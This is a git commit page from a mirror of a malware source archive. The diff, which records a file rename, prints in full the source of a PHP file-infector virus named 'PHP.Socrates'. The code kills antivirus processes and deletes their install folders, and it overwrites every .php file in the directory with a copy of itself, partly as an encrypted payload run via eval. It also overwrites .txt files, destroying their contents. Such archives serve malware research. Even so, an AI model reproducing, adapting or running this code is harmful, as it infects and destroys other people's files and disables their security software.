Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

Rename PHP/Virus.PHP.Socrate.a to Other/Virus.PHP.Socrate.a

This commit is contained in:
vxunderground 2020-11-02 23:56:50 -06:00 committed by GitHub
parent 670d0eb11a
commit 52299c9be2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 81 additions and 81 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

162
PHP/Virus.PHP.Socrate.a → Other/Virus.PHP.Socrate.a
View File

@ -1,141 +1,141 @@
<?php <?php
echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing."); echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
$decrypt= $decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n" "function SocratesDecrypt(\$string,\$key)\r\n"
."{ \r\n" ."{ \r\n"
." \$codez=''; \r\n" ." \$codez=''; \r\n"
." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n" ." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
." { \r\n" ." { \r\n"
." \$value=ord(\$string[\$i]); \r\n" ." \$value=ord(\$string[\$i]); \r\n"
." \$valuez=\$value+\$key; \r\n" ." \$valuez=\$value+\$key; \r\n"
." \$codez.=chr(\$valuez); \r\n" ." \$codez.=chr(\$valuez); \r\n"
." } \r\n" ." } \r\n"
." return \$codez; \r\n" ." return \$codez; \r\n"
." } \r\n" ." } \r\n"
."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n" ."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
."\$break = Explode('/', \$filez); \r\n" ."\$break = Explode('/', \$filez); \r\n"
."\$pfile = \$break[count(\$break) - 1];\r\n" ."\$pfile = \$break[count(\$break) - 1];\r\n"
."\$c = fopen(\$pfile,'rb');\r\n" ."\$c = fopen(\$pfile,'rb');\r\n"
."\$d = fread(\$c,filesize(\$pfile));\r\n" ."\$d = fread(\$c,filesize(\$pfile));\r\n"
."fclose(\$c);\r\n" ."fclose(\$c);\r\n"
."\$next=strlen(\$d)-693;\r\n" ."\$next=strlen(\$d)-693;\r\n"
."\$virus=substr(\$d,687,\$next);\r\n" ."\$virus=substr(\$d,687,\$next);\r\n"
."\$vr=SocratesDecrypt(\$virus,'1');\r\n" ."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
."eval(\$vr);"; ."eval(\$vr);";
function SocratesCrypt($string,$key) function SocratesCrypt($string,$key)
{ {
$codez=""; $codez="";
for($i=0; $i<strlen($string); $i++) for($i=0; $i<strlen($string); $i++)
{ {
$value=ord($string[$i]);
$valuez=$value-$key; $value=ord($string[$i]);
$valuez=$value-$key;
$codez.=chr($valuez);
$codez.=chr($valuez);
} }
return $codez;
return $codez;
} }
if(is_dir("C:\Program Files\Norton*")) if(is_dir("C:\Program Files\Norton*"))
{ {
exec("taskkill /f /t /im nod32.exe"); exec("taskkill /f /t /im nod32.exe");
rmdir("C:\Program Files\Norton*"); rmdir("C:\Program Files\Norton*");
} }
if(is_dir("C:\Program Files\McAfee*")) if(is_dir("C:\Program Files\McAfee*"))
{ {
exec("taskkill /f /t /im Mcshield.exe"); exec("taskkill /f /t /im Mcshield.exe");
rmdir("C:\Program Files\McAfee*"); rmdir("C:\Program Files\McAfee*");
} }
if(is_dir("C:\Program Files\Kaspersky*")) if(is_dir("C:\Program Files\Kaspersky*"))
{ {
exec("taskkill /f /t /im KAV.exe"); exec("taskkill /f /t /im KAV.exe");
rmdir("C:\Program Files\Kaspersky*"); rmdir("C:\Program Files\Kaspersky*");
} }
$filez = $_SERVER["SCRIPT_NAME"]; $filez = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $filez); $break = Explode('/', $filez);
$pfile = $break[count($break) - 1]; $pfile = $break[count($break) - 1];
$c = fopen($pfile,'rb'); $c = fopen($pfile,'rb');
$d = fread($c,filesize($pfile)); $d = fread($c,filesize($pfile));
fclose($c); fclose($c);
$nextsize=strlen($d)-4; $nextsize=strlen($d)-4;
$virus=(substr($d,7,$nextsize)); $virus=(substr($d,7,$nextsize));
$dir=opendir('*.*'); $dir=opendir('*.*');
while (($file = readdir($dir)) !== false) while (($file = readdir($dir)) !== false)
{ {
if (strstr($file,'.php')) if (strstr($file,'.php'))
{ {
$f = fopen($file,'rb'); $f = fopen($file,'rb');
$contents = fread($f, filesize($file)); $contents = fread($f, filesize($file));
if (!strstr($contents, 'Socrates')) if (!strstr($contents, 'Socrates'))
{ {
if(!file_exists("Socrates.php")) { if(!file_exists("Socrates.php")) {
fclose($f); fclose($f);
$g = fopen($file,'w'); $g = fopen($file,'w');
fwrite($g,$d); fwrite($g,$d);
fclose($g); fclose($g);
} }
@ -143,11 +143,11 @@ while (($file = readdir($dir)) !== false)
if(file_exists("Socrates.php")) if(file_exists("Socrates.php"))
{ {
fclose($f); fclose($f);
$g = fopen($file,'w'); $g = fopen($file,'w');
fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>'); fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
fclose($g); fclose($g);
} }
@ -155,20 +155,20 @@ while (($file = readdir($dir)) !== false)
} }
} }
if (strstr($file,'.txt')) if (strstr($file,'.txt'))
{ {
$f = fopen($file,'w'); $f = fopen($file,'w');
fwrite($f,"Let him that would move the world, first move himself."); fwrite($f,"Let him that would move the world, first move himself.");
} }
}?> }?>